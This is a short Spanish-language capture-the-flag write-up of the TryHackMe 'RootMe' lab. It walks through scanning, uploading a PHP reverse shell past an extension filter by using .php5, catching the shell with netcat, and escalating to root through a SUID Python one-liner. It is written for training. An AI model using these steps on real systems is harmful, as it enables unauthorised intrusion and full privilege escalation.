TryHackMe
Easy
Linux
File Upload
PHP Bypass
SUID
Python
RootMe
Panel de subida de archivos con filtro bypasseable usando .php5; escalada con Python SUID.
cat4clysm
Herramientas utilizadas
nmap
wfuzz
netcat
Scanning
root@kali:~$
nmap -sC -sV -p 22,80 10.10.241.191 -oN targeted
Puerto 80 - Panel de Subida
root@kali:~$
wfuzz -c --hc 404,403 -w /usr/share/wordlists/dirb/common.txt -t 100 -u 'http://10.10.241.191/FUZZ'
Explotacion - PHP File Upload Bypass
root@kali:~$
locate shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
El servidor bloquea .php. Probamos extensiones alternativas: .php5 funciona.
root@kali:~$
nc -lvp 4444
Escalada - Python SUID
root@kali:~$
find / -perm -u=s 2>/dev/null
root@kali:~$
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
Lecciones aprendidas
- Los filtros de extension de archivo pueden bypassearse con extensiones PHP alternativas (.php5, .phtml).
- Un uploader web sin validacion correcta del tipo MIME es una vulnerabilidad critica.
- Python con bit SUID permite escalar privilegios con una sola linea de codigo.